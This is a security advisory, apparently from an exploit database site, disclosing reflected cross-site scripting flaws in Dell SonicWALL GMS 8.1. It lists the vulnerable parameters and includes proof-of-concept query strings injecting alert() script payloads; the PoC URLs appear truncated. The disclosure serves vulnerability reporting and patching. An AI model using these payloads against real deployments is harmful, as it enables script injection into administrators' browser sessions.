Dell SonicWALL Global Management System GMS 8.1 Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

i>>? Dell SonicWALL Global Management System GMS 8.1 XSS Vulnerabilities Vendor: Dell Inc. Product web page: Affected version: 8.1 8.0 SP1 Build 8048.1410 Flow Server Virtual Appliance Analyzer Virtual Appliance Fixed in: 8.2 (VR-2016-01-C1D) Summary: Provide your organization, distributed enterprise or managed service offering with an intuitive, powerful way to rapidly deploy and centrally manage SonicWall solutions, with SonicWall GMS. Get more value from your firewall, secure remote access, anti-spam, and backup and recovery solutions with enhanced network security monitoring and robust network security reporting. By deploying GMS in an enterprise, you can minimize administrative overhead by streamlining security appliance deployment and policy management. Desc: Dell SonicWALL GMS suffers from multiple reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: SonicWALL MySQL/5.0.96-community-nt Apache-Coyote/1.1 Apache Tomcat 6.0.41 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5389 Advisory URL: Vendor: 26.01.2016 -- Reflected Cross-Site Scripting (XSS) via several parameters: - typeOfUnits (GET) - level (GET) - node_id (GET) - node_name (GET) - reportId (GET) - reportName (GET) - unitType (GET) - help_url (GET) - screenID (GET) PoC:,4&level=1&typeOfUnits=11d0a4%27-alert(%27XSS%27)-%27f313a&node_name=Admin%20Overview&node_id=0,4&level=1&typeOfUnits=1&node_name=Admin%20Overview06654'-alert(1)-'426bf&node_id=0'%3balert(1)%2f%2f644&reportName=Data%20Usage%20Summary'%3balert(1)%2f%2f284'%3balert(1)%2f%2f623&reportId=37011&reportName=Data%20Usage%20Summary'%3balert(1)%2f%2f736&node_name=Admin%20Overview&unitType=1&reportId=37011&reportName=Data%20Usage%20Summary';alert(251)//


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top